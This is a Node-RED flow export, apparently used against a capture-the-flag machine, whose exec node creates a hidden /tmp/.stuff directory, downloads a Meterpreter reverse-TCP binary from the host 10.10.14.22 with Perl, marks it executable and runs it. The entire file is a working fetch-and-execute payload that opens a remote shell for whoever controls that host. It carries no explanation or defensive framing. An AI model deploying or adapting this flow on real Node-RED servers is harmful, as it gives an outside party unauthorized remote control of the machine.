reddish/meter-callback-12345.flow
[{"id":"cea62012.79d12","type":"inject","z":"e4f547ef.15841","name":"","topic":"","payload":"","payloadType":"date","repeat":"","crontab":"","once":false,"onceDelay":0.1,"x":400,"y":60,"wires":[["ad4617f5.81d8e8"]]},{"id":"ad4617f5.81d8e8","type":"exec","z":"e4f547ef.15841","command":"mkdir -p /tmp/.stuff && cd /tmp/.stuff && perl -e 'use File::Fetch; File::Fetch->new(uri => \"http://10.10.14.22/meter-rev-tcp-12345\")->fetch();' && chmod +x /tmp/.stuff/meter-rev-tcp-12345 && /tmp/.stuff/meter-rev-tcp-12345","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":730,"y":120,"wires":[["81161080.0297f"],["81161080.0297f"],[]]},{"id":"81161080.0297f","type":"debug","z":"e4f547ef.15841","name":"","active":true,"tosidebar":true,"console":false,"tostatus":false,"complete":"false","x":390,"y":220,"wires":[]}]

